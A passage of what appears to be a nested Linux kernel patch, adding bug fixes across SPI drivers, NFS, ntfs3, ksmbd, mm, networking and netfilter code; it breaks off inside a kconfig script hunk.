+diff --git a/drivers/spi/spi-geni-qcom.c b/drivers/spi/spi-geni-qcom.c
+index 7b76dcd11e2bb5..17b5299c18c731 100644
+--- a/drivers/spi/spi-geni-qcom.c
++++ b/drivers/spi/spi-geni-qcom.c
+@@ -954,22 +954,24 @@ static int spi_geni_probe(struct platform_device *pdev)
+ 	spin_lock_init(&mas->lock);
+ 	pm_runtime_use_autosuspend(&pdev->dev);
+ 	pm_runtime_set_autosuspend_delay(&pdev->dev, 250);
+-	pm_runtime_enable(dev);
++	ret = devm_pm_runtime_enable(dev);
++	if (ret)
++		return ret;
+ 
+ 	ret = geni_icc_get(&mas->se, NULL);
+ 	if (ret)
+-		goto spi_geni_probe_runtime_disable;
++		return ret;
+ 	/* Set the bus quota to a reasonable value for register access */
+ 	mas->se.icc_paths[GENI_TO_CORE].avg_bw = Bps_to_icc(CORE_2X_50_MHZ);
+ 	mas->se.icc_paths[CPU_TO_GENI].avg_bw = GENI_DEFAULT_BW;
+ 
+ 	ret = geni_icc_set_bw(&mas->se);
+ 	if (ret)
+-		goto spi_geni_probe_runtime_disable;
++		return ret;
+ 
+ 	ret = spi_geni_init(mas);
+ 	if (ret)
+-		goto spi_geni_probe_runtime_disable;
++		return ret;
+ 
+ 	/*
+ 	 * check the mode supported and set_cs for fifo mode only
+@@ -998,12 +1000,10 @@ static int spi_geni_probe(struct platform_device *pdev)
+ 	free_irq(mas->irq, spi);
+ spi_geni_release_dma:
+ 	spi_geni_release_dma_chan(mas);
+-spi_geni_probe_runtime_disable:
+-	pm_runtime_disable(dev);
+ 	return ret;
+ }
+ 
+-static int spi_geni_remove(struct platform_device *pdev)
++static void spi_geni_remove(struct platform_device *pdev)
+ {
+ 	struct spi_master *spi = platform_get_drvdata(pdev);
+ 	struct spi_geni_master *mas = spi_master_get_devdata(spi);
+@@ -1011,11 +1011,9 @@ static int spi_geni_remove(struct platform_device *pdev)
+ 	/* Unregister _before_ disabling pm_runtime() so we stop transfers */
+ 	spi_unregister_master(spi);
+ 
+-	spi_geni_release_dma_chan(mas);
+-
+ 	free_irq(mas->irq, spi);
+-	pm_runtime_disable(&pdev->dev);
+-	return 0;
++
++	spi_geni_release_dma_chan(mas);
+ }
+ 
+ static int __maybe_unused spi_geni_runtime_suspend(struct device *dev)
+@@ -1097,7 +1095,7 @@ MODULE_DEVICE_TABLE(of, spi_geni_dt_match);
+ 
+ static struct platform_driver spi_geni_driver = {
+ 	.probe  = spi_geni_probe,
+-	.remove = spi_geni_remove,
++	.remove_new = spi_geni_remove,
+ 	.driver = {
+ 		.name = "geni_spi",
+ 		.pm = &spi_geni_pm_ops,
+diff --git a/drivers/spi/spi-nxp-fspi.c b/drivers/spi/spi-nxp-fspi.c
+index afecf69d3cebaa..c1a96daadbf642 100644
+--- a/drivers/spi/spi-nxp-fspi.c
++++ b/drivers/spi/spi-nxp-fspi.c
+@@ -754,14 +754,15 @@ static void nxp_fspi_fill_txfifo(struct nxp_fspi *f,
+ 	if (i < op->data.nbytes) {
+ 		u32 data = 0;
+ 		int j;
++		int remaining = op->data.nbytes - i;
+ 		/* Wait for TXFIFO empty */
+ 		ret = fspi_readl_poll_tout(f, f->iobase + FSPI_INTR,
+ 					   FSPI_INTR_IPTXWE, 0,
+ 					   POLL_TOUT, true);
+ 		WARN_ON(ret);
+ 
+-		for (j = 0; j < ALIGN(op->data.nbytes - i, 4); j += 4) {
+-			memcpy(&data, buf + i + j, 4);
++		for (j = 0; j < ALIGN(remaining, 4); j += 4) {
++			memcpy(&data, buf + i + j, min_t(int, 4, remaining - j));
+ 			fspi_writel(f, data, base + FSPI_TFDR + j);
+ 		}
+ 		fspi_writel(f, FSPI_INTR_IPTXWE, base + FSPI_INTR);
+diff --git a/drivers/staging/media/atomisp/pci/sh_css_frac.h b/drivers/staging/media/atomisp/pci/sh_css_frac.h
+index 8f08df5c88cc36..569a2f59e5519f 100644
+--- a/drivers/staging/media/atomisp/pci/sh_css_frac.h
++++ b/drivers/staging/media/atomisp/pci/sh_css_frac.h
+@@ -30,12 +30,24 @@
+ #define uISP_VAL_MAX		      ((unsigned int)((1 << uISP_REG_BIT) - 1))
+ 
+ /* a:fraction bits for 16bit precision, b:fraction bits for ISP precision */
+-#define sDIGIT_FITTING(v, a, b) \
+-	min_t(int, max_t(int, (((v) >> sSHIFT) >> max(sFRACTION_BITS_FITTING(a) - (b), 0)), \
+-	  sISP_VAL_MIN), sISP_VAL_MAX)
+-#define uDIGIT_FITTING(v, a, b) \
+-	min((unsigned int)max((unsigned)(((v) >> uSHIFT) \
+-	>> max((int)(uFRACTION_BITS_FITTING(a) - (b)), 0)), \
+-	  uISP_VAL_MIN), uISP_VAL_MAX)
++static inline int sDIGIT_FITTING(int v, int a, int b)
++{
++	int fit_shift = sFRACTION_BITS_FITTING(a) - b;
++
++	v >>= sSHIFT;
++	v >>= fit_shift > 0 ? fit_shift : 0;
++
++	return clamp_t(int, v, sISP_VAL_MIN, sISP_VAL_MAX);
++}
++
++static inline unsigned int uDIGIT_FITTING(unsigned int v, int a, int b)
++{
++	int fit_shift = uFRACTION_BITS_FITTING(a) - b;
++
++	v >>= uSHIFT;
++	v >>= fit_shift > 0 ? fit_shift : 0;
++
++	return clamp_t(unsigned int, v, uISP_VAL_MIN, uISP_VAL_MAX);
++}
+ 
+ #endif /* __SH_CSS_FRAC_H */
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index e5017b2ade573c..894887640c4360 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -4379,6 +4379,7 @@ static int __btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 
+ 	btrfs_i_size_write(dir, dir->vfs_inode.i_size - name->len * 2);
+ 	inode_inc_iversion(&inode->vfs_inode);
++	inode_set_ctime_current(&inode->vfs_inode);
+ 	inode_inc_iversion(&dir->vfs_inode);
+ 	inode->vfs_inode.i_ctime = current_time(&inode->vfs_inode);
+ 	dir->vfs_inode.i_mtime = inode->vfs_inode.i_ctime;
+diff --git a/fs/nfs/delegation.c b/fs/nfs/delegation.c
+index ead8a0e06abf9a..2ba4d221bf9d5b 100644
+--- a/fs/nfs/delegation.c
++++ b/fs/nfs/delegation.c
+@@ -627,6 +627,9 @@ static int nfs_server_return_marked_delegations(struct nfs_server *server,
+ 				prev = delegation;
+ 			continue;
+ 		}
++		inode = nfs_delegation_grab_inode(delegation);
++		if (inode == NULL)
++			continue;
+ 
+ 		if (prev) {
+ 			struct inode *tmp = nfs_delegation_grab_inode(prev);
+@@ -637,12 +640,6 @@ static int nfs_server_return_marked_delegations(struct nfs_server *server,
+ 			}
+ 		}
+ 
+-		inode = nfs_delegation_grab_inode(delegation);
+-		if (inode == NULL) {
+-			rcu_read_unlock();
+-			iput(to_put);
+-			goto restart;
+-		}
+ 		delegation = nfs_start_delegation_return_locked(NFS_I(inode));
+ 		rcu_read_unlock();
+ 
+@@ -1164,7 +1161,6 @@ static int nfs_server_reap_unclaimed_delegations(struct nfs_server *server,
+ 	struct inode *inode;
+ restart:
+ 	rcu_read_lock();
+-restart_locked:
+ 	list_for_each_entry_rcu(delegation, &server->delegations, super_list) {
+ 		if (test_bit(NFS_DELEGATION_INODE_FREEING,
+ 					&delegation->flags) ||
+@@ -1175,7 +1171,7 @@ static int nfs_server_reap_unclaimed_delegations(struct nfs_server *server,
+ 			continue;
+ 		inode = nfs_delegation_grab_inode(delegation);
+ 		if (inode == NULL)
+-			goto restart_locked;
++			continue;
+ 		delegation = nfs_start_delegation_return_locked(NFS_I(inode));
+ 		rcu_read_unlock();
+ 		if (delegation != NULL) {
+@@ -1296,7 +1292,6 @@ static int nfs_server_reap_expired_delegations(struct nfs_server *server,
+ 	nfs4_stateid stateid;
+ restart:
+ 	rcu_read_lock();
+-restart_locked:
+ 	list_for_each_entry_rcu(delegation, &server->delegations, super_list) {
+ 		if (test_bit(NFS_DELEGATION_INODE_FREEING,
+ 					&delegation->flags) ||
+@@ -1307,7 +1302,7 @@ static int nfs_server_reap_expired_delegations(struct nfs_server *server,
+ 			continue;
+ 		inode = nfs_delegation_grab_inode(delegation);
+ 		if (inode == NULL)
+-			goto restart_locked;
++			continue;
+ 		spin_lock(&delegation->lock);
+ 		cred = get_cred_rcu(delegation->cred);
+ 		nfs4_stateid_copy(&stateid, &delegation->stateid);
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 467e9439ededba..1e97de7c8c204b 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -9850,13 +9850,16 @@ static void nfs4_layoutreturn_done(struct rpc_task *task, void *calldata)
+ 		fallthrough;
+ 	default:
+ 		task->tk_status = 0;
++		lrp->res.lrs_present = 0;
+ 		fallthrough;
+ 	case 0:
+ 		break;
+ 	case -NFS4ERR_DELAY:
+-		if (nfs4_async_handle_error(task, server, NULL, NULL) != -EAGAIN)
+-			break;
+-		goto out_restart;
++		if (nfs4_async_handle_error(task, server, NULL, NULL) ==
++		    -EAGAIN)
++			goto out_restart;
++		lrp->res.lrs_present = 0;
++		break;
+ 	}
+ 	return;
+ out_restart:
+diff --git a/fs/nfs/pnfs.c b/fs/nfs/pnfs.c
+index 8c1f47ca5dc536..c96d2e76156e8b 100644
+--- a/fs/nfs/pnfs.c
++++ b/fs/nfs/pnfs.c
+@@ -1172,10 +1172,9 @@ void pnfs_layoutreturn_free_lsegs(struct pnfs_layout_hdr *lo,
+ 	LIST_HEAD(freeme);
+ 
+ 	spin_lock(&inode->i_lock);
+-	if (!pnfs_layout_is_valid(lo) ||
+-	    !nfs4_stateid_match_other(&lo->plh_stateid, arg_stateid))
++	if (!nfs4_stateid_match_other(&lo->plh_stateid, arg_stateid))
+ 		goto out_unlock;
+-	if (stateid) {
++	if (stateid && pnfs_layout_is_valid(lo)) {
+ 		u32 seq = be32_to_cpu(arg_stateid->seqid);
+ 
+ 		pnfs_mark_matching_lsegs_invalid(lo, &freeme, range, seq);
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index 723e49ec83ce77..82bd9b5d9bd801 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -29,7 +29,7 @@ static inline bool al_is_valid_le(const struct ntfs_inode *ni,
+ void al_destroy(struct ntfs_inode *ni)
+ {
+ 	run_close(&ni->attr_list.run);
+-	kfree(ni->attr_list.le);
++	kvfree(ni->attr_list.le);
+ 	ni->attr_list.le = NULL;
+ 	ni->attr_list.size = 0;
+ 	ni->attr_list.dirty = false;
+@@ -318,7 +318,7 @@ int al_add_le(struct ntfs_inode *ni, enum ATTR_TYPE type, const __le16 *name,
+ 		memcpy(ptr, al->le, off);
+ 		memcpy(Add2Ptr(ptr, off + sz), le, old_size - off);
+ 		le = Add2Ptr(ptr, off);
+-		kfree(al->le);
++		kvfree(al->le);
+ 		al->le = ptr;
+ 	} else {
+ 		memmove(Add2Ptr(le, sz), le, old_size - off);
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index 70d9d08fc61bc1..8dbd8e70c2956e 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -124,7 +124,7 @@ void wnd_close(struct wnd_bitmap *wnd)
+ {
+ 	struct rb_node *node, *next;
+ 
+-	kfree(wnd->free_bits);
++	kvfree(wnd->free_bits);
+ 	run_close(&wnd->run);
+ 
+ 	node = rb_first(&wnd->start_tree);
+@@ -1333,7 +1333,7 @@ int wnd_extend(struct wnd_bitmap *wnd, size_t new_bits)
+ 		memcpy(new_free, wnd->free_bits, wnd->nwnd * sizeof(short));
+ 		memset(new_free + wnd->nwnd, 0,
+ 		       (new_wnd - wnd->nwnd) * sizeof(short));
+-		kfree(wnd->free_bits);
++		kvfree(wnd->free_bits);
+ 		wnd->free_bits = new_free;
+ 	}
+ 
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index 7bfdc91fae1ed1..b3299cda596227 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -773,7 +773,7 @@ static int ni_try_remove_attr_list(struct ntfs_inode *ni)
+ 	run_deallocate(sbi, &ni->attr_list.run, true);
+ 	run_close(&ni->attr_list.run);
+ 	ni->attr_list.size = 0;
+-	kfree(ni->attr_list.le);
++	kvfree(ni->attr_list.le);
+ 	ni->attr_list.le = NULL;
+ 	ni->attr_list.dirty = false;
+ 
+@@ -924,7 +924,7 @@ int ni_create_attr_list(struct ntfs_inode *ni)
+ 	goto out;
+ 
+ out1:
+-	kfree(ni->attr_list.le);
++	kvfree(ni->attr_list.le);
+ 	ni->attr_list.le = NULL;
+ 	ni->attr_list.size = 0;
+ 	return err;
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index 667ff92f5afc5b..eee54214f4a3db 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -441,7 +441,7 @@ static noinline void put_ntfs(struct ntfs_sb_info *sbi)
+ {
+ 	kfree(sbi->new_rec);
+ 	kvfree(ntfs_put_shared(sbi->upcase));
+-	kfree(sbi->def_table);
++	kvfree(sbi->def_table);
+ 
+ 	wnd_close(&sbi->mft.bitmap);
+ 	wnd_close(&sbi->used.bitmap);
+diff --git a/fs/smb/server/mgmt/share_config.c b/fs/smb/server/mgmt/share_config.c
+index e0a6b758094fc5..d8d03070ae44b4 100644
+--- a/fs/smb/server/mgmt/share_config.c
++++ b/fs/smb/server/mgmt/share_config.c
+@@ -15,6 +15,7 @@
+ #include "share_config.h"
+ #include "user_config.h"
+ #include "user_session.h"
++#include "../connection.h"
+ #include "../transport_ipc.h"
+ #include "../misc.h"
+ 
+@@ -120,12 +121,13 @@ static int parse_veto_list(struct ksmbd_share_config *share,
+ 	return 0;
+ }
+ 
+-static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
++static struct ksmbd_share_config *share_config_request(struct ksmbd_work *work,
+ 						       const char *name)
+ {
+ 	struct ksmbd_share_config_response *resp;
+ 	struct ksmbd_share_config *share = NULL;
+ 	struct ksmbd_share_config *lookup;
++	struct unicode_map *um = work->conn->um;
+ 	int ret;
+ 
+ 	resp = ksmbd_ipc_share_config_request(name);
+@@ -181,7 +183,14 @@ static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+ 				      KSMBD_SHARE_CONFIG_VETO_LIST(resp),
+ 				      resp->veto_list_sz);
+ 		if (!ret && share->path) {
++			if (__ksmbd_override_fsids(work, share)) {
++				kill_share(share);
++				share = NULL;
++				goto out;
++			}
++
+ 			ret = kern_path(share->path, 0, &share->vfs_path);
++			ksmbd_revert_fsids(work);
+ 			if (ret) {
+ 				ksmbd_debug(SMB, "failed to access '%s'\n",
+ 					    share->path);
+@@ -214,7 +223,7 @@ static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+ 	return share;
+ }
+ 
+-struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
++struct ksmbd_share_config *ksmbd_share_config_get(struct ksmbd_work *work,
+ 						  const char *name)
+ {
+ 	struct ksmbd_share_config *share;
+@@ -227,7 +236,7 @@ struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
+ 
+ 	if (share)
+ 		return share;
+-	return share_config_request(um, name);
++	return share_config_request(work, name);
+ }
+ 
+ bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
+diff --git a/fs/smb/server/mgmt/share_config.h b/fs/smb/server/mgmt/share_config.h
+index 5f591751b92365..d4ac2dd4de2040 100644
+--- a/fs/smb/server/mgmt/share_config.h
++++ b/fs/smb/server/mgmt/share_config.h
+@@ -11,6 +11,8 @@
+ #include <linux/path.h>
+ #include <linux/unicode.h>
+ 
++struct ksmbd_work;
++
+ struct ksmbd_share_config {
+ 	char			*name;
+ 	char			*path;
+@@ -68,7 +70,7 @@ static inline void ksmbd_share_config_put(struct ksmbd_share_config *share)
+ 	__ksmbd_share_config_put(share);
+ }
+ 
+-struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
++struct ksmbd_share_config *ksmbd_share_config_get(struct ksmbd_work *work,
+ 						  const char *name);
+ bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
+ 			       const char *filename);
+diff --git a/fs/smb/server/mgmt/tree_connect.c b/fs/smb/server/mgmt/tree_connect.c
+index d2c81a8a11dda1..94a52a75014a43 100644
+--- a/fs/smb/server/mgmt/tree_connect.c
++++ b/fs/smb/server/mgmt/tree_connect.c
+@@ -16,17 +16,18 @@
+ #include "user_session.h"
+ 
+ struct ksmbd_tree_conn_status
+-ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			const char *share_name)
++ksmbd_tree_conn_connect(struct ksmbd_work *work, const char *share_name)
+ {
+ 	struct ksmbd_tree_conn_status status = {-ENOENT, NULL};
+ 	struct ksmbd_tree_connect_response *resp = NULL;
+ 	struct ksmbd_share_config *sc;
+ 	struct ksmbd_tree_connect *tree_conn = NULL;
+ 	struct sockaddr *peer_addr;
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
+ 	int ret;
+ 
+-	sc = ksmbd_share_config_get(conn->um, share_name);
++	sc = ksmbd_share_config_get(work, share_name);
+ 	if (!sc)
+ 		return status;
+ 
+@@ -61,7 +62,7 @@ ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		struct ksmbd_share_config *new_sc;
+ 
+ 		ksmbd_share_config_del(sc);
+-		new_sc = ksmbd_share_config_get(conn->um, share_name);
++		new_sc = ksmbd_share_config_get(work, share_name);
+ 		if (!new_sc) {
+ 			pr_err("Failed to update stale share config\n");
+ 			status.ret = -ESTALE;
+diff --git a/fs/smb/server/mgmt/tree_connect.h b/fs/smb/server/mgmt/tree_connect.h
+index 6377a70b811c89..a42cdd05104114 100644
+--- a/fs/smb/server/mgmt/tree_connect.h
++++ b/fs/smb/server/mgmt/tree_connect.h
+@@ -13,6 +13,7 @@
+ struct ksmbd_share_config;
+ struct ksmbd_user;
+ struct ksmbd_conn;
++struct ksmbd_work;
+ 
+ enum {
+ 	TREE_NEW = 0,
+@@ -50,8 +51,7 @@ static inline int test_tree_conn_flag(struct ksmbd_tree_connect *tree_conn,
+ struct ksmbd_session;
+ 
+ struct ksmbd_tree_conn_status
+-ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			const char *share_name);
++ksmbd_tree_conn_connect(struct ksmbd_work *work, const char *share_name);
+ void ksmbd_tree_connect_put(struct ksmbd_tree_connect *tcon);
+ 
+ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 898622b52b48e8..dc8f1e7ce2fa96 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -1975,7 +1975,7 @@ int smb2_tree_connect(struct ksmbd_work *work)
+ 	ksmbd_debug(SMB, "tree connect request for tree %s treename %s\n",
+ 		    name, treename);
+ 
+-	status = ksmbd_tree_conn_connect(conn, sess, name);
++	status = ksmbd_tree_conn_connect(work, name);
+ 	if (status.ret == KSMBD_TREE_CONN_STATUS_OK)
+ 		rsp->hdr.Id.SyncId.TreeId = cpu_to_le32(status.tree_conn->id);
+ 	else
+@@ -3482,7 +3482,7 @@ int smb2_open(struct ksmbd_work *work)
+ 	kfree(name);
+ 	kfree(lc);
+ 
+-	return 0;
++	return rc;
+ }
+ 
+ static int readdir_info_level_struct_sz(int info_level)
+@@ -5326,6 +5326,11 @@ int smb2_query_info(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "GOT query info request\n");
+ 
++	if (ksmbd_override_fsids(work)) {
++		rc = -ENOMEM;
++		goto err_out;
++	}
++
+ 	switch (req->InfoType) {
+ 	case SMB2_O_INFO_FILE:
+ 		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
+@@ -5344,6 +5349,7 @@ int smb2_query_info(struct ksmbd_work *work)
+ 			    req->InfoType);
+ 		rc = -EOPNOTSUPP;
+ 	}
++	ksmbd_revert_fsids(work);
+ 
+ 	if (!rc) {
+ 		rsp->StructureSize = cpu_to_le16(9);
+@@ -5353,6 +5359,7 @@ int smb2_query_info(struct ksmbd_work *work)
+ 					le32_to_cpu(rsp->OutputBufferLength));
+ 	}
+ 
++err_out:
+ 	if (rc < 0) {
+ 		if (rc == -EACCES)
+ 			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index e90a1e8c1951db..bdcdc0fc9cad5e 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -729,10 +729,10 @@ bool is_asterisk(char *p)
+ 	return p && p[0] == '*';
+ }
+ 
+-int ksmbd_override_fsids(struct ksmbd_work *work)
++int __ksmbd_override_fsids(struct ksmbd_work *work,
++		struct ksmbd_share_config *share)
+ {
+ 	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_share_config *share = work->tcon->share_conf;
+ 	struct cred *cred;
+ 	struct group_info *gi;
+ 	unsigned int uid;
+@@ -772,6 +772,11 @@ int ksmbd_override_fsids(struct ksmbd_work *work)
+ 	return 0;
+ }
+ 
++int ksmbd_override_fsids(struct ksmbd_work *work)
++{
++	return __ksmbd_override_fsids(work, work->tcon->share_conf);
++}
++
+ void ksmbd_revert_fsids(struct ksmbd_work *work)
+ {
+ 	const struct cred *cred;
+diff --git a/fs/smb/server/smb_common.h b/fs/smb/server/smb_common.h
+index f1092519c0c288..4a3148b0167f54 100644
+--- a/fs/smb/server/smb_common.h
++++ b/fs/smb/server/smb_common.h
+@@ -447,6 +447,8 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn,
+ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command);
+ 
+ int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp);
++int __ksmbd_override_fsids(struct ksmbd_work *work,
++			   struct ksmbd_share_config *share);
+ int ksmbd_override_fsids(struct ksmbd_work *work);
+ void ksmbd_revert_fsids(struct ksmbd_work *work);
+ 
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index b2aee17a34d775..271c5a87751fe3 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -973,7 +973,8 @@ struct mlx5_ifc_qos_cap_bits {
+ 
+ 	u8         max_tsar_bw_share[0x20];
+ 
+-	u8         reserved_at_100[0x20];
++	u8         nic_element_type[0x10];
++	u8         nic_tsar_type[0x10];
+ 
+ 	u8         reserved_at_120[0x3];
+ 	u8         log_meter_aso_granularity[0x5];
+@@ -3742,10 +3743,11 @@ enum {
+ };
+ 
+ enum {
+-	ELEMENT_TYPE_CAP_MASK_TASR		= 1 << 0,
++	ELEMENT_TYPE_CAP_MASK_TSAR		= 1 << 0,
+ 	ELEMENT_TYPE_CAP_MASK_VPORT		= 1 << 1,
+ 	ELEMENT_TYPE_CAP_MASK_VPORT_TC		= 1 << 2,
+ 	ELEMENT_TYPE_CAP_MASK_PARA_VPORT_TC	= 1 << 3,
++	ELEMENT_TYPE_CAP_MASK_QUEUE_GROUP	= 1 << 4,
+ };
+ 
+ struct mlx5_ifc_scheduling_context_bits {
+@@ -4444,6 +4446,12 @@ enum {
+ 	TSAR_ELEMENT_TSAR_TYPE_ETS = 0x2,
+ };
+ 
++enum {
++	TSAR_TYPE_CAP_MASK_DWRR		= 1 << 0,
++	TSAR_TYPE_CAP_MASK_ROUND_ROBIN	= 1 << 1,
++	TSAR_TYPE_CAP_MASK_ETS		= 1 << 2,
++};
++
+ struct mlx5_ifc_tsar_element_bits {
+ 	u8         reserved_at_0[0x8];
+ 	u8         tsar_type[0x8];
+diff --git a/include/linux/virtio_net.h b/include/linux/virtio_net.h
+index 823e28042f4107..62613d4d84b718 100644
+--- a/include/linux/virtio_net.h
++++ b/include/linux/virtio_net.h
+@@ -161,7 +161,8 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 			break;
+ 		case SKB_GSO_TCPV4:
+ 		case SKB_GSO_TCPV6:
+-			if (skb->csum_offset != offsetof(struct tcphdr, check))
++			if (skb->ip_summed == CHECKSUM_PARTIAL &&
++			    skb->csum_offset != offsetof(struct tcphdr, check))
+ 				return -EINVAL;
+ 			break;
+ 		}
+diff --git a/mm/memory.c b/mm/memory.c
+index 73085e36aabac5..da9fed5e602530 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -2480,11 +2480,7 @@ static inline int remap_p4d_range(struct mm_struct *mm, pgd_t *pgd,
+ 	return 0;
+ }
+ 
+-/*
+- * Variant of remap_pfn_range that does not call track_pfn_remap.  The caller
+- * must have pre-validated the caching bits of the pgprot_t.
+- */
+-int remap_pfn_range_notrack(struct vm_area_struct *vma, unsigned long addr,
++static int remap_pfn_range_internal(struct vm_area_struct *vma, unsigned long addr,
+ 		unsigned long pfn, unsigned long size, pgprot_t prot)
+ {
+ 	pgd_t *pgd;
+@@ -2537,6 +2533,27 @@ int remap_pfn_range_notrack(struct vm_area_struct *vma, unsigned long addr,
+ 	return 0;
+ }
+ 
++/*
++ * Variant of remap_pfn_range that does not call track_pfn_remap.  The caller
++ * must have pre-validated the caching bits of the pgprot_t.
++ */
++int remap_pfn_range_notrack(struct vm_area_struct *vma, unsigned long addr,
++		unsigned long pfn, unsigned long size, pgprot_t prot)
++{
++	int error = remap_pfn_range_internal(vma, addr, pfn, size, prot);
++
++	if (!error)
++		return 0;
++
++	/*
++	 * A partial pfn range mapping is dangerous: it does not
++	 * maintain page reference counts, and callers may free
++	 * pages due to the error. So zap it early.
++	 */
++	zap_page_range_single(vma, addr, size, NULL);
++	return error;
++}
++
+ /**
+  * remap_pfn_range - remap kernel memory to userspace
+  * @vma: user vma to map to
+diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
+index 7bcc933103e2d4..c29c976a259659 100644
+--- a/net/ipv4/fou.c
++++ b/net/ipv4/fou.c
+@@ -334,11 +334,11 @@ static struct sk_buff *gue_gro_receive(struct sock *sk,
+ 	struct gro_remcsum grc;
+ 	u8 proto;
+ 
++	skb_gro_remcsum_init(&grc);
++
+ 	if (!fou)
+ 		goto out;
+ 
+-	skb_gro_remcsum_init(&grc);
+-
+ 	off = skb_gro_offset(skb);
+ 	len = off + sizeof(*guehdr);
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index f001e15474029f..03c1500eae7e07 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -349,15 +349,21 @@ mptcp_pm_del_add_timer(struct mptcp_sock *msk,
+ {
+ 	struct mptcp_pm_add_entry *entry;
+ 	struct sock *sk = (struct sock *)msk;
++	struct timer_list *add_timer = NULL;
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	entry = mptcp_lookup_anno_list_by_saddr(msk, addr);
+-	if (entry && (!check_id || entry->addr.id == addr->id))
++	if (entry && (!check_id || entry->addr.id == addr->id)) {
+ 		entry->retrans_times = ADD_ADDR_RETRANS_MAX;
++		add_timer = &entry->add_timer;
++	}
++	if (!check_id && entry)
++		list_del(&entry->list);
+ 	spin_unlock_bh(&msk->pm.lock);
+ 
+-	if (entry && (!check_id || entry->addr.id == addr->id))
+-		sk_stop_timer_sync(sk, &entry->add_timer);
++	/* no lock, because sk_stop_timer_sync() is calling del_timer_sync() */
++	if (add_timer)
++		sk_stop_timer_sync(sk, add_timer);
+ 
+ 	return entry;
+ }
+@@ -1488,7 +1494,6 @@ static bool remove_anno_list_by_saddr(struct mptcp_sock *msk,
+ 
+ 	entry = mptcp_pm_del_add_timer(msk, addr, false);
+ 	if (entry) {
+-		list_del(&entry->list);
+ 		kfree(entry);
+ 		return true;
+ 	}
+diff --git a/net/netfilter/nft_socket.c b/net/netfilter/nft_socket.c
+index f28324fd8d7183..0f37738e4b26a4 100644
+--- a/net/netfilter/nft_socket.c
++++ b/net/netfilter/nft_socket.c
+@@ -110,13 +110,13 @@ static void nft_socket_eval(const struct nft_expr *expr,
+ 			*dest = READ_ONCE(sk->sk_mark);
+ 		} else {
+ 			regs->verdict.code = NFT_BREAK;
+-			return;
++			goto out_put_sk;
+ 		}
+ 		break;
+ 	case NFT_SOCKET_WILDCARD:
+ 		if (!sk_fullsock(sk)) {
+ 			regs->verdict.code = NFT_BREAK;
+-			return;
++			goto out_put_sk;
+ 		}
+ 		nft_socket_wildcard(pkt, regs, sk, dest);
+ 		break;
+@@ -124,7 +124,7 @@ static void nft_socket_eval(const struct nft_expr *expr,
+ 	case NFT_SOCKET_CGROUPV2:
+ 		if (!nft_sock_get_eval_cgroupv2(dest, sk, pkt, priv->level)) {
+ 			regs->verdict.code = NFT_BREAK;
+-			return;
++			goto out_put_sk;
+ 		}
+ 		break;
+ #endif
+@@ -133,6 +133,7 @@ static void nft_socket_eval(const struct nft_expr *expr,
+ 		regs->verdict.code = NFT_BREAK;
+ 	}
+ 
++out_put_sk:
+ 	if (sk != skb->sk)
+ 		sock_gen_put(sk);
+ }
+diff --git a/scripts/kconfig/merge_config.sh b/scripts/kconfig/merge_config.sh
+index e5b46980c22ae7..72da3b8d6f307b 100755
+--- a/scripts/kconfig/merge_config.sh
++++ b/scripts/kconfig/merge_config.sh
+@@ -160,6 +160,8 @@ for ORIG_MERGE_FILE in $MERGE_LIST ; do
+ 			sed -i "/$CFG[ =]/d" $MERGE_FILE
+ 		fi
+ 	done
